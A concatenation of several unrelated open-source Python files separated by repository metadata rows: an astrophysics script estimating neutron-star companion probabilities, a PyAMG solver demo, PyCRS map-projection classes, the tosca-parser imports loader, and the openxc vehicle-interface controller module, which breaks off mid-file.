reg.register_pattern("nn.bitserial_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
|
apache-2.0
| -8,713,760,548,054,790,000
| 34.243641
| 97
| 0.685722
| false
| 3.330424
| false
| false
| false
|
adrn/tilt-shift
|
scripts/companion.py
|
1
|
5554
|
# coding: utf-8
from __future__ import division, print_function
__author__ = "adrn <adrn@astro.columbia.edu>"
# Standard library
import os
import sys
import urllib2
import warnings
# Third-party
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import truncnorm, scoreatpercentile
# Neutron star distribution properties (fixed)
bounds_NS = (1.3, 2.) # Msun
mean_NS = 1.4 # Msun
stddev_NS = 0.05 # Msun
# White dwarf mass bounds
bounds_WD = (0.2, 1.44)
# Number of steps to use in numerical integration below
Nintegrate = 4096
def integrand_factor(m2, mf, m1):
""" Compute the factor multiplying p(M_2|θ) in the integral of Equation XXX in the paper """
mtot = m1 + m2
return mtot**(4/3.) * mf**(-1/3.) / m2 / np.sqrt(m2**2 - (mf*mtot**2)**(2/3.)) / 3.
def m2_func(p, mf, m1, bounds_WD, m2s):
mean_WD,stddev_WD,f_NS = p
# White dwarf companion mixture component
lower, upper = bounds_WD
dist_WD = truncnorm((lower - mean_WD) / stddev_WD, (upper - mean_WD) / stddev_WD, loc=mean_WD, scale=stddev_WD)
# Neutron star companion mixture component
lower, upper = bounds_NS
dist_NS = truncnorm((lower - mean_NS) / stddev_NS, (upper - mean_NS) / stddev_NS, loc=mean_NS, scale=stddev_NS)
p_WD = (1-f_NS) * dist_WD.pdf(m2s)
p_NS = f_NS * dist_NS.pdf(m2s)
return p_WD + p_NS
def likelihood(p, mf, m1, bounds_WD):
mean_WD,stddev_WD,f_NS = p
m2s = np.linspace(0., 2., Nintegrate)
dm2 = m2s[1] - m2s[0]
integ_fac = integrand_factor(m2s, mf, m1)
# White dwarf companion mixture component
lower, upper = bounds_WD
dist_WD = truncnorm((lower - mean_WD) / stddev_WD, (upper - mean_WD) / stddev_WD, loc=mean_WD, scale=stddev_WD)
# Neutron star companion mixture component
lower, upper = bounds_NS
dist_NS = truncnorm((lower - mean_NS) / stddev_NS, (upper - mean_NS) / stddev_NS, loc=mean_NS, scale=stddev_NS)
p_WD = (1-f_NS) * dist_WD.pdf(m2s)
p_NS = f_NS * dist_NS.pdf(m2s)
# Zero out when evaluating outside of allowed bounds (normally NaN)
integ_fac[np.isnan(integ_fac)] = 0.
p_WD[np.isnan(p_WD)] = 0.
p_NS[np.isnan(p_NS)] = 0.
# we approximate the integral using the trapezoidal rule
integrand_WD = p_WD * integ_fac
integrand_NS = p_NS * integ_fac
p_WD = dm2/2. * (integrand_WD[0] + np.sum(2*integrand_WD[1:-1], axis=0) + integrand_WD[-1])
p_NS = dm2/2. * (integrand_NS[0] + np.sum(2*integrand_NS[1:-1], axis=0) + integrand_NS[-1])
return np.vstack((p_WD, p_NS))
def main(m1, mf, nsamples):
file_url = "http://files.figshare.com/1720018/posterior_samples.txt"
cache_path = "data"
local_file = os.path.join(cache_path, "posterior_samples.txt")
if not os.path.exists(cache_path):
os.mkdir(cache_path)
if not os.path.exists(local_file):
print("Posterior sample file doesn't exist locally.")
print("Downloading and caching to: {}".format(os.path.abspath(local_file)))
# download and save
f = urllib2.urlopen(file_url)
with open(local_file, 'w') as f2:
f2.write(f.read())
else:
print("Reading cached file from: {}".format(os.path.abspath(local_file)))
samples = np.genfromtxt(local_file, delimiter=',', names=True)
m2s = np.linspace(0, 2., 50)
p_m2s = np.zeros((nsamples, len(m2s)))
P_NS = np.zeros(nsamples)
for i,p in enumerate(samples[:nsamples]):
p_WD,p_NS = likelihood(p, mf, m1, bounds_WD)[:,0]
P_NS[i] = p_NS / (p_WD + p_NS)
p_m2s[i] = integrand_factor(m2s, mf, m1) * m2_func(p, mf, m1, bounds_WD, m2s)
fig,axes = plt.subplots(2,1,figsize=(10,12))
binw = 3.5*np.std(P_NS) / len(P_NS)**(1/3.)
axes[0].hist(P_NS, bins=np.arange(0.,1.+binw,binw), normed=True)
axes[0].set_xlabel(r"$P_{\rm NS}$")
axes[0].axvline(np.mean(P_NS), alpha=0.5, lw=2., color='g')
axes[0].axvline(scoreatpercentile(P_NS,16), alpha=0.5, lw=2., color='g', linestyle='dashed')
axes[0].axvline(scoreatpercentile(P_NS,84), alpha=0.5, lw=2., color='g', linestyle='dashed')
axes[0].set_xlim(0,max(P_NS)+0.05)
axes[1].errorbar(m2s, np.mean(p_m2s,axis=0), np.std(p_m2s,axis=0),
marker='o', ecolor='#666666')
# for i in np.random.randint(0,nsamples,100):
# axes[1].plot(m2s, p_m2s[i], marker=None, lw=2., color='#666666', alpha=0.25)
# axes[1].plot(m2s, np.mean(p_m2s,axis=0), marker=None, lw=2., color='k')
axes[1].set_xlabel(r"${\rm M}_2 [{\rm M}_\odot]$")
print("Mean P_NS: {:.3f}".format(np.mean(P_NS)))
print("Std. deviation P_NS: {:.3f}".format(np.std(P_NS)))
print("Median P_NS: {:.3f}".format(np.median(P_NS)))
print("16th percentile P_NS: {:.3f}".format(scoreatpercentile(P_NS,16)))
print("84th percentile P_NS: {:.3f}".format(scoreatpercentile(P_NS,84)))
plt.show()
if __name__ == '__main__':
from argparse import ArgumentParser
# Define parser object
parser = ArgumentParser(description="")
parser.add_argument("--m1", dest="m1", default=None, required=True,
type=float, help="Mass of the primary.")
parser.add_argument("--mf", dest="mf", default=None, required=True,
type=float, help="Mass function.")
parser.add_argument("--nsamples", dest="nsamples", default=1000,
type=int, help="Number of posterior samples to use.")
args = parser.parse_args()
warnings.simplefilter("ignore", RuntimeWarning)
main(args.m1, args.mf, nsamples=args.nsamples)
|
mit
| 9,173,242,311,238,589,000
| 34.14557
| 115
| 0.618585
| false
| 2.751734
| false
| false
| false
|
pombreda/pyamg
|
pyamg/gallery/demo.py
|
1
|
2087
|
"""Basic PyAMG demo showing AMG standalone convergence versus preconditioned CG
with AMG"""
__docformat__ = "restructuredtext en"
__all__ = ['demo']
import scipy
import numpy
from pyamg.gallery import poisson
from pyamg.aggregation import smoothed_aggregation_solver
def demo():
A = poisson((100,100), format='csr') # 2D FD Poisson problem
B = None # no near-null spaces guesses for SA
b = scipy.rand(A.shape[0],1) # a random right-hand side
# Construct solver using AMG based on Smoothed Aggregation (SA) and display info
mls = smoothed_aggregation_solver(A, B=B)
print mls
# Solve Ax=b with no acceleration ('standalone' solver)
standalone_residuals = []
x = mls.solve(b, tol=1e-10, accel=None, residuals=standalone_residuals)
# Solve Ax=b with Conjugate Gradient (AMG as a preconditioner to CG)
accelerated_residuals = []
x = mls.solve(b, tol=1e-10, accel='cg', residuals=accelerated_residuals)
# Compute relative residuals
standalone_residuals = numpy.array(standalone_residuals)/standalone_residuals[0]
accelerated_residuals = numpy.array(accelerated_residuals)/accelerated_residuals[0]
# Compute (geometric) convergence factors
factor1 = standalone_residuals[-1]**(1.0/len(standalone_residuals))
factor2 = accelerated_residuals[-1]**(1.0/len(accelerated_residuals))
print " MG convergence factor: %g"%(factor1)
print "MG with CG acceleration convergence factor: %g"%(factor2)
# Plot convergence history
try:
import pylab
pylab.figure()
pylab.title('Convergence History')
pylab.xlabel('Iteration')
pylab.ylabel('Relative Residual')
pylab.semilogy(standalone_residuals, label='Standalone', linestyle='-', marker='o')
pylab.semilogy(accelerated_residuals, label='Accelerated', linestyle='-', marker='s')
pylab.legend()
pylab.show()
except ImportError:
print "\n\nNote: pylab not available on your system."
|
bsd-3-clause
| -2,089,875,078,849,389,000
| 39.134615
| 93
| 0.663153
| false
| 3.746858
| false
| false
| false
|
karimbahgat/PyCRS
|
pycrs/elements/projections.py
|
1
|
8280
|
"""
Named projection classes that can be created or parsed.
"""
def find(projname, crstype, strict=False):
"""
Search for a projection name located in this module.
Arguments:
- **projname**: The projection name to search for.
- **crstype**: Which CRS naming convention to search (different
CRS formats have different names for the same projection).
- **strict** (optional): If False, ignores minor name mismatches
such as underscore or character casing, otherwise must be exact
match (defaults to False).
"""
if not strict:
projname = projname.lower().replace(" ","_")
for itemname,item in globals().items():
if itemname.startswith("_"):
continue
try:
if hasattr(item.name, crstype):
itemname = getattr(item.name, crstype)
if not strict:
itemname = itemname.lower().replace(" ","_")
if projname == itemname:
return item
except:
pass
else:
return None
##+proj Projection name (see `proj -l`)
class Projection:
proj4 = "+proj"
ogc_wkt = "PROJECTION"
esri_wkt = "PROJECTION"
name = None
def __init__(self, **kwargs):
"""
A generic container for the specific projection used.
Args:
- **name**: A pycrs.projections.ProjName instance with the name given by each supported format.
"""
self.name = kwargs.get('name', self.name)
def to_proj4(self):
return "+proj=%s" %self.name.proj4
def to_ogc_wkt(self):
return 'PROJECTION["%s"]' %self.name.ogc_wkt
def to_esri_wkt(self):
return 'PROJECTION["%s"]' %self.name.esri_wkt
class ProjName:
def __init__(self, proj4="", ogc_wkt="", esri_wkt=""):
self.proj4 = proj4
self.ogc_wkt = ogc_wkt
self.esri_wkt = esri_wkt
# Specific predefined ellipsoid classes
class Robinson(Projection):
name = ProjName(
proj4 = "robin",
ogc_wkt = "Robinson",
esri_wkt = "Robinson",
)
class UTM(Projection):
name = ProjName(
proj4 = "utm",
ogc_wkt = "Transverse_Mercator",
esri_wkt = "Transverse_Mercator",
)
class ObliqueMercator(Projection):
name = ProjName(
proj4 = "omerc",
ogc_wkt = "Hotine_Oblique_Mercator_Two_Point_Natural_Origin", #"Hotine_Oblique_Mercator"
esri_wkt = "Hotine_Oblique_Mercator_Two_Point_Natural_Origin", #"Hotine_Oblique_Mercator_Azimuth_Natural_Origin"
)
class AlbersEqualArea(Projection):
name = ProjName(
proj4 = "aea",
ogc_wkt = "Albers_Conic_Equal_Area",
esri_wkt = "Albers",
)
class CylindricalEqualArea(Projection):
name = ProjName(
proj4 = "cea",
ogc_wkt = "Cylindrical_Equal_Area",
esri_wkt = "Cylindrical_Equal_Area",
)
class EquiDistantConic(Projection):
name = ProjName(
proj4 = "eqdc",
ogc_wkt = "Equidistant_Conic",
esri_wkt = "Equidistant_Conic",
)
class EquiDistantCylindrical(Projection):
# same as equirectangular...?
name = ProjName(
proj4 = "eqc",
ogc_wkt = "Equidistant_Cylindrical",
esri_wkt = "Equidistant_Cylindrical",
)
class EquiRectangular(Projection):
# same as equidistant cylindrical
name = ProjName(
proj4 = "eqc",
ogc_wkt = "Equirectangular",
esri_wkt = "Equirectangular",
)
class TransverseMercator(Projection):
name = ProjName(
proj4 = "tmerc",
ogc_wkt = "Transverse_Mercator",
esri_wkt = "Transverse_Mercator",
)
class GallStereographic(Projection):
name = ProjName(
proj4 = "gall",
ogc_wkt = "Gall_Stereographic",
esri_wkt = "Gall_Stereographic",
)
class Gnomonic(Projection):
name = ProjName(
proj4 = "gnom",
ogc_wkt = "Gnomonic",
esri_wkt = "Gnomonic",
)
class LambertAzimuthalEqualArea(Projection):
name = ProjName(
proj4 = "laea",
ogc_wkt = "Lambert_Azimuthal_Equal_Area",
esri_wkt = "Lambert_Azimuthal_Equal_Area",
)
class MillerCylindrical(Projection):
name = ProjName(
proj4 = "mill",
ogc_wkt = "Miller_Cylindrical",
esri_wkt = "Miller_Cylindrical",
)
class Mollweide(Projection):
name = ProjName(
proj4 = "moll",
ogc_wkt = "Mollweide",
esri_wkt = "Mollweide",
)
class ObliqueStereographic(Projection):
name = ProjName(
proj4 = "sterea",
ogc_wkt = "Oblique_Stereographic",
esri_wkt = "Oblique Stereographic", #"Stereographic_North_Pole"
)
class Orthographic(Projection):
name = ProjName(
proj4 = "ortho",
ogc_wkt = "Orthographic",
esri_wkt = "Orthographic",
)
class Stereographic(Projection):
name = ProjName(
proj4 = "stere",
ogc_wkt = "Stereographic",
esri_wkt = "Stereographic",
)
class PolarStereographic(Projection):
name = ProjName(
proj4 = "stere",
ogc_wkt = "Polar_Stereographic", # could also be just stereographic
esri_wkt = "Stereographic", # but also spelled with additional _South/North_Pole, for the same projection and diff params (maybe just for humans)?...
)
class Sinusoidal(Projection):
name = ProjName(
proj4 = "sinu",
ogc_wkt = "Sinusoidal",
esri_wkt = "Sinusoidal",
)
class VanDerGrinten(Projection):
name = ProjName(
proj4 = "vandg",
ogc_wkt = "VanDerGrinten",
esri_wkt = "Van_der_Grinten_I",
)
class LambertConformalConic(Projection):
name = ProjName(
proj4 = "lcc",
ogc_wkt = "Lambert_Conformal_Conic", # possible has some variants
esri_wkt = "Lambert_Conformal_Conic",
)
class Krovak(Projection):
name = ProjName(
proj4 = "krovak",
ogc_wkt = "Krovak",
esri_wkt = "Krovak",
)
class NearSidedPerspective(Projection):
name = ProjName(
proj4 = "nsper",
ogc_wkt = "Near_sided_perspective",
esri_wkt = "Near_sided_perspective", # not confirmed
)
class TiltedPerspective(Projection):
name = ProjName(
proj4 = "tsper",
ogc_wkt = "Tilted_perspective",
esri_wkt = "Tilted_perspective", # not confirmed
)
class InteruptedGoodeHomolosine(Projection):
name = ProjName(
proj4 = "igh",
ogc_wkt = "Interrupted_Goodes_Homolosine",
esri_wkt = "Interrupted_Goodes_Homolosine",
)
class Larrivee(Projection):
name = ProjName(
proj4 = "larr",
ogc_wkt = "Larrivee",
esri_wkt = "Larrivee", # not confirmed
)
class LamberEqualAreaConic(Projection):
name = ProjName(
proj4 = "leac",
ogc_wkt = "Lambert_Equal_Area_Conic",
esri_wkt = "Lambert_Equal_Area_Conic", # not confirmed
)
class Mercator(Projection):
name = ProjName(
proj4 = "merc",
ogc_wkt = "Mercator", # has multiple varieties
esri_wkt = "Mercator",
)
class ObliqueCylindricalEqualArea(Projection):
name = ProjName(
proj4 = "ocea",
ogc_wkt = "Oblique_Cylindrical_Equal_Area",
esri_wkt = "Oblique_Cylindrical_Equal_Area",
)
class Polyconic(Projection):
name = ProjName(
proj4 = "poly",
ogc_wkt = "Polyconic",
esri_wkt = "Polyconic",
)
class EckertIV(Projection):
name = ProjName(
proj4 = "eck4",
ogc_wkt = "Eckert_IV",
esri_wkt = "Eckert_IV",
)
class EckertVI(Projection):
name = ProjName(
proj4 = "eck6",
ogc_wkt = "Eckert_VI",
esri_wkt = "Eckert_VI",
)
class AzimuthalEquidistant(Projection):
name = ProjName(
proj4 = "aeqd",
ogc_wkt = "Azimuthal_Equidistant",
esri_wkt = "Azimuthal_Equidistant",
)
class GeostationarySatellite(Projection):
name = ProjName(
proj4 = "geos",
ogc_wkt = "Geostationary_Satellite",
esri_wkt = "Geostationary_Satellite",
)
|
mit
| -6,452,796,678,563,627,000
| 24.555556
| 157
| 0.577415
| false
| 3.220537
| false
| false
| false
|
superfluidity/RDCL3D
|
code/toscaparser/imports.py
|
1
|
14032
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
from toscaparser.common.exception import ExceptionCollector
from toscaparser.common.exception import InvalidPropertyValueError
from toscaparser.common.exception import MissingRequiredFieldError
from toscaparser.common.exception import UnknownFieldError
from toscaparser.common.exception import ValidationError
from toscaparser.elements.tosca_type_validation import TypeValidation
from toscaparser.utils.gettextutils import _
import toscaparser.utils.urlutils
import toscaparser.utils.yamlparser
YAML_LOADER = toscaparser.utils.yamlparser.load_yaml
log = logging.getLogger("tosca")
class ImportsLoader(object):
IMPORTS_SECTION = (FILE, REPOSITORY, NAMESPACE_URI, NAMESPACE_PREFIX) = \
('file', 'repository', 'namespace_uri',
'namespace_prefix')
def __init__(self, importslist, path, type_definition_list=None,
tpl=None, project=None):
self.project = project
self.importslist = importslist
self.custom_defs = {}
self.nested_tosca_tpls = []
if not path and not tpl:
msg = _('Input tosca template is not provided.')
log.warning(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
self.path = path
self.repositories = {}
if tpl and tpl.get('repositories'):
self.repositories = tpl.get('repositories')
self.type_definition_list = []
if type_definition_list:
if isinstance(type_definition_list, list):
self.type_definition_list = type_definition_list
else:
self.type_definition_list.append(type_definition_list)
self._validate_and_load_imports()
def get_custom_defs(self):
return self.custom_defs
def get_nested_tosca_tpls(self):
return self.nested_tosca_tpls
def _validate_and_load_imports(self):
imports_names = set()
if not self.importslist:
msg = _('"imports" keyname is defined without including '
'templates.')
log.error(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
return
for import_def in self.importslist:
if isinstance(import_def, dict):
for import_name, import_uri in import_def.items():
if import_name in imports_names:
msg = (_('Duplicate import name "%s" was found.') %
import_name)
log.error(msg)
ExceptionCollector.appendException(
ValidationError(message=msg))
imports_names.add(import_name)
full_file_name, custom_type = self._load_import_template(
import_name, import_uri)
namespace_prefix = None
if isinstance(import_uri, dict):
namespace_prefix = import_uri.get(
self.NAMESPACE_PREFIX)
if custom_type:
TypeValidation(custom_type, import_def)
self._update_custom_def(custom_type, namespace_prefix)
else: # old style of imports
full_file_name, custom_type = self._load_import_template(
None, import_def)
if custom_type:
TypeValidation(
custom_type, import_def)
self._update_custom_def(custom_type, None)
self._update_nested_tosca_tpls(full_file_name, custom_type)
def _update_custom_def(self, custom_type, namespace_prefix):
outer_custom_types = {}
for type_def in self.type_definition_list:
outer_custom_types = custom_type.get(type_def)
if outer_custom_types:
if type_def == "imports":
self.custom_defs.update({'imports': outer_custom_types})
else:
if namespace_prefix:
prefix_custom_types = {}
for type_def_key in outer_custom_types.keys():
namespace_prefix_to_key = (namespace_prefix +
"." + type_def_key)
prefix_custom_types[namespace_prefix_to_key] = \
outer_custom_types[type_def_key]
self.custom_defs.update(prefix_custom_types)
else:
self.custom_defs.update(outer_custom_types)
def _update_nested_tosca_tpls(self, full_file_name, custom_tpl):
if full_file_name and custom_tpl:
topo_tpl = {full_file_name: custom_tpl}
self.nested_tosca_tpls.append(topo_tpl)
def _validate_import_keys(self, import_name, import_uri_def):
if self.FILE not in import_uri_def.keys():
log.warning(_('Missing keyname "file" in import "%(name)s".')
% {'name': import_name})
ExceptionCollector.appendException(
MissingRequiredFieldError(
what='Import of template "%s"' % import_name,
required=self.FILE))
for key in import_uri_def.keys():
if key not in self.IMPORTS_SECTION:
log.warning(_('Unknown keyname "%(key)s" error in '
'imported definition "%(def)s".')
% {'key': key, 'def': import_name})
ExceptionCollector.appendException(
UnknownFieldError(
what='Import of template "%s"' % import_name,
field=key))
def _load_import_template(self, import_name, import_uri_def):
"""Handle custom types defined in imported template files
This method loads the custom type definitions referenced in "imports"
section of the TOSCA YAML template by determining whether each import
is specified via a file reference (by relative or absolute path) or a
URL reference.
Possibilities:
+----------+--------+------------------------------+
| template | import | comment |
+----------+--------+------------------------------+
| file | file | OK |
| file | URL | OK |
| preparsed| file | file must be a full path |
| preparsed| URL | OK |
| URL | file | file must be a relative path |
| URL | URL | OK |
+----------+--------+------------------------------+
"""
short_import_notation = False
if isinstance(import_uri_def, dict):
self._validate_import_keys(import_name, import_uri_def)
file_name = import_uri_def.get(self.FILE)
repository = import_uri_def.get(self.REPOSITORY)
repos = self.repositories.keys()
if repository is not None:
if repository not in repos:
ExceptionCollector.appendException(
InvalidPropertyValueError(
what=_('Repository is not found in "%s"') % repos))
else:
file_name = import_uri_def
repository = None
short_import_notation = True
if not file_name:
msg = (_('A template file name is not provided with import '
'definition "%(import_name)s".')
% {'import_name': import_name})
log.error(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
return None, None
yaml_template = None
if toscaparser.utils.urlutils.UrlUtils.validate_url(file_name):
return file_name, YAML_LOADER(file_name, False)
elif not repository:
import_template = None
if self.path:
if toscaparser.utils.urlutils.UrlUtils.validate_url(self.path):
if os.path.isabs(file_name):
msg = (_('Absolute file name "%(name)s" cannot be '
'used in a URL-based input template '
'"%(template)s".')
% {'name': file_name, 'template': self.path})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
import_template = toscaparser.utils.urlutils.UrlUtils.\
join_url(self.path, file_name)
a_file = False
else:
a_file = True
main_a_file = os.path.isfile(self.path)
if main_a_file:
if os.path.isfile(file_name):
import_template = file_name
else:
full_path = os.path.join(
os.path.dirname(os.path.abspath(self.path)),
file_name)
if os.path.isfile(full_path):
import_template = full_path
else:
file_path = file_name.rpartition("/")
dir_path = os.path.dirname(os.path.abspath(
self.path))
if file_path[0] != '' and dir_path.endswith(
file_path[0]):
import_template = dir_path + "/" +\
file_path[2]
if not os.path.isfile(import_template):
msg = (_('"%(import_template)s" is'
'not a valid file')
% {'import_template':
import_template})
log.error(msg)
ExceptionCollector.appendException
(ValueError(msg))
else: # template is pre-parsed
id_name, file_extension = os.path.splitext(file_name)
if self.project is not None and id_name in self.project:
a_file = False
yaml_template = self.project[id_name]
import_template = file_name
elif os.path.isabs(file_name) and os.path.isfile(file_name):
a_file = True
import_template = file_name
else:
msg = (_('Relative file name "%(name)s" cannot be used '
'in a pre-parsed input template.')
% {'name': file_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
if not import_template:
log.error(_('Import "%(name)s" is not valid.') %
{'name': import_uri_def})
ExceptionCollector.appendException(
ImportError(_('Import "%s" is not valid.') %
import_uri_def))
return None, None
if yaml_template is not None:
#print yaml_template
return None, yaml_template
else:
return import_template, YAML_LOADER(import_template, a_file)
if short_import_notation:
log.error(_('Import "%(name)s" is not valid.') % import_uri_def)
ExceptionCollector.appendException(
ImportError(_('Import "%s" is not valid.') % import_uri_def))
return None, None
full_url = ""
if repository:
if self.repositories:
for repo_name, repo_def in self.repositories.items():
if repo_name == repository:
# Remove leading, ending spaces and strip
# the last character if "/"
repo_url = ((repo_def['url']).strip()).rstrip("//")
full_url = repo_url + "/" + file_name
if not full_url:
msg = (_('referenced repository "%(n_uri)s" in import '
'definition "%(tpl)s" not found.')
% {'n_uri': repository, 'tpl': import_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
if toscaparser.utils.urlutils.UrlUtils.validate_url(full_url):
return full_url, YAML_LOADER(full_url, False)
else:
msg = (_('repository url "%(n_uri)s" is not valid in import '
'definition "%(tpl)s".')
% {'n_uri': repo_url, 'tpl': import_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
|
apache-2.0
| 8,705,253,170,228,588,000
| 46.087248
| 79
| 0.498788
| false
| 4.815374
| false
| false
| false
|
openxc/openxc-python
|
openxc/controllers/base.py
|
1
|
18242
|
"""Contains the abstract interface for sending commands back to a vehicle
interface.
"""
import numbers
import time
import threading
import binascii
try:
from queue import Queue
from queue import Empty
except ImportError:
# Python 3
from queue import Queue
from queue import Empty
class ResponseReceiver(object):
"""All commands to a vehicle interface are asynchronous. This class is used to
wait for the response for a particular request in a thread. Before making a
request, a ResponseReceiver is created to wait for the response. All
responses received from the VI (which may or may not be in response to this
particular command) are passed to the ResponseReceiver, until it either
times out waiting or finds a matching response.
The synchronization mechanism is a multiprocessing Queue. The
ResponseReceiver blocks waiting on a new response to be added to the queue,
and the vehicle interface class puts newly received responses in the queues
of ResponseReceivers as they arrive.
"""
COMMAND_RESPONSE_TIMEOUT_S = 0.5
def __init__(self, queue, request, quit_after_first=True):
"""Construct a new ResponseReceiver.
queue - A multithreading queue that this receiver will pull potential responses from.
request - The request we are trying to match up with a response.
"""
self.diag_dict = {}
self.request = request
self.queue = queue
self.responses = []
self.running = True
self.quit_after_first = quit_after_first
def _response_matches_request(self, response):
"""Inspect the given response and return true if it's a response to this
ResponseReceiver's request.
This implementation is the base class no-op - it returns True for any
response. You probably want to override this in a subclass.
response - the response to inspect.
"""
return True
def wait_for_responses(self):
"""Block the thread and wait for the response to the given request to
arrive from the VI. If no matching response is received in
COMMAND_RESPONSE_TIMEOUT_S seconds, returns anyway.
"""
self.thread.join(self.COMMAND_RESPONSE_TIMEOUT_S)
self.running = False
return self.responses
def start(self):
self.thread = threading.Thread(target=self.handle_responses)
self.thread.start()
def handle_responses(self):
"""Block and wait for responses to this object's original request, or
until a timeout (self.COMMAND_RESPONSE_TIMEOUT_S).
This function is handy to use as the target function for a thread.
The responses received (or None if none was received before the timeout)
is stored in a list at self.responses.
"""
while self.running:
try:
response = self.queue.get(
timeout=self.COMMAND_RESPONSE_TIMEOUT_S)
if self._response_matches_request(response):
if type(self) == DiagnosticResponseReceiver:
if self._response_is_multiframe(response):
if response['id'] in self.diag_dict:
self.diag_dict[response['id']].addFrame(response)
else:
self.diag_dict[response['id']] = MultiframeDiagnosticMessage(response)
if self._return_final(response):
self.responses.append(self.diag_dict[response['id']].getResponse())
self.diag_dict.pop(response['id'])
self.responses.append(response)
if self.quit_after_first:
self.running = False
self.queue.task_done()
except Empty:
break
class MultiframeDiagnosticMessage:
def __init__(self, response):
self.id = response['id'] - 16
self.mode = response['mode']
self.bus = response['bus']
self.pid = response['pid']
self.payload = '0x' + response['payload'][8:]
def addFrame(self, response):
self.payload += response['payload'][8:]
def getResponse(self):
request = {
'timestamp': 0,
'bus': self.bus,
'id': self.id,
'mode': self.mode,
'success': True,
'pid': self.pid,
'payload': self.payload
}
return request
class CommandResponseReceiver(ResponseReceiver):
"""A receiver that matches the 'command' field in responses to the
original request.
"""
def _response_matches_request(self, response):
"""Return true if the 'command' field in the response matches the
original request.
"""
return response.get('command_response', None) == self.request['command']
class DiagnosticResponseReceiver(ResponseReceiver):
"""A receiver that matches the bus, ID, mode and PID from a
diagnostic request to an incoming response.
"""
def __init__(self, queue, request):
super(DiagnosticResponseReceiver, self).__init__(queue, request,
quit_after_first=False)
# Make sure to key off of the diagnostic request, not the command to
# create the request
self.diagnostic_request = request['request']
def _response_matches_request(self, response):
"""Return true if the response is to a diagnostic request, and the bus,
id, mode match. If the request was successful, the PID echo is also
checked.
"""
# Accept success/failure command responses
if super(DiagnosticResponseReceiver,
self)._response_matches_request(response):
return True
if ('bus' in self.diagnostic_request and
response.get('bus', None) != self.diagnostic_request['bus']):
return False
if (self.diagnostic_request['id'] != 0x7df and
response.get('id', None) != self.diagnostic_request['id']):
return False
if (response.get('success', True) and
response.get('pid', None) !=
self.diagnostic_request.get('pid', None)):
return False
return response.get('mode', None) == self.diagnostic_request['mode']
def _response_is_multiframe(self, response):
if 'frame' in response:
return True
return False
def _return_final(self, response):
if response['frame'] == -1:
return True
return False
class Controller(object):
"""A Controller is a physical vehicle interface that accepts commands to be
send back to the vehicle. This class is abstract, and implementations of the
interface must define at least the ``write_bytes`` method.
"""
def _prepare_response_receiver(self, request,
receiver_class=CommandResponseReceiver):
queue = Queue()
self.open_requests = getattr(self, 'open_requests', [])
self.open_requests.append(queue)
receiver = receiver_class(queue, request)
receiver.start()
# Give it a brief moment to get started so we make sure get the response
time.sleep(.2)
return receiver
def complex_request(self, request, wait_for_first_response=True):
"""Send a compound command request to the interface over the normal data
channel.
request - A dict storing the request to send to the VI. It will be
serialized to the currently selected output format.
wait_for_first_response - If true, this function will block waiting for
a response from the VI and return it to the caller. Otherwise, it
will send the command and return immediately and any response will
be lost.
"""
receiver = self._prepare_response_receiver(request,
receiver_class=CommandResponseReceiver)
self._send_complex_request(request)
responses = []
if wait_for_first_response:
responses = receiver.wait_for_responses()
return responses
def _send_complex_request(self, request):
self.write_bytes(self.streamer.serialize_for_stream(request))
@classmethod
def _build_diagnostic_request(cls, id, mode, bus=None, pid=None,
frequency=None, payload=None, decoded_type=None):
request = {
'command': "diagnostic_request",
'request': {
'id': id,
'mode': mode
}
}
if bus is not None:
request['request']['bus'] = bus
request['request']['mode'] = mode
if payload is not None and len(payload) > 0:
# payload must be a bytearray
request['request']['payload'] = "0x%s" % binascii.hexlify(payload)
if pid is not None:
request['request']['pid'] = pid
if frequency is not None:
request['request']['frequency'] = frequency
if decoded_type is not None:
request['request']['decoded_type'] = decoded_type
return request
def delete_diagnostic_request(self, id, mode, bus=None, pid=None):
request = self._build_diagnostic_request(id, mode, bus, pid)
request['action'] = 'cancel'
return self._check_command_response_status(request)
def create_diagnostic_request(self, id, mode, bus=None, pid=None,
frequency=None, payload=None, wait_for_ack=True,
wait_for_first_response=False, decoded_type=None):
"""Send a new diagnostic message request to the VI
Required:
id - The message ID (arbitration ID) for the request.
mode - the diagnostic mode (or service).
Optional:
bus - The address of the CAN bus controller to send the request, either
1 or 2 for current VI hardware.
pid - The parameter ID, or PID, for the request (e.g. for a mode 1
request).
frequency - The frequency in hertz to add this as a recurring diagnostic
requests. Must be greater than 0, or None if it is a one-time
request.
payload - A bytearray to send as the request's optional payload. Only
single frame diagnostic requests are supported by the VI firmware in
the current version, so the payload has a maximum length of 6.
wait_for_ack - If True, will wait for an ACK of the command message.
wait_for_first_response - If True, this function will block waiting for
a diagnostic response to be received for the request. It will return
either after timing out or after 1 matching response is received -
there may be more responses to functional broadcast requests that
arrive after returning.
Returns a tuple of
([list of ACK responses to create request],
[list of diagnostic responses received])
"""
request = self._build_diagnostic_request(id, mode, bus, pid,
frequency, payload, decoded_type)
diag_response_receiver = None
if wait_for_first_response:
diag_response_receiver = self._prepare_response_receiver(
request, DiagnosticResponseReceiver)
request['action'] = 'add'
ack_responses = self.complex_request(request, wait_for_ack)
diag_responses = None
if diag_response_receiver is not None:
diag_responses = diag_response_receiver.wait_for_responses()
return ack_responses, diag_responses
def _check_command_response_status(self, request):
responses = self.complex_request(request)
return len(responses) > 0 and responses[0]['status']
def set_passthrough(self, bus, enabled):
"""Control the status of CAN message passthrough for a bus.
Returns True if the command was successful.
"""
request = {
"command": "passthrough",
"bus": bus,
"enabled": enabled
}
return self._check_command_response_status(request)
def set_payload_format(self, payload_format):
"""Set the payload format for messages sent to and from the VI.
Returns True if the command was successful.
"""
request = {
"command": "payload_format",
"format": payload_format
}
status = self._check_command_response_status(request)
# Always change the format regardless because if it was already in the
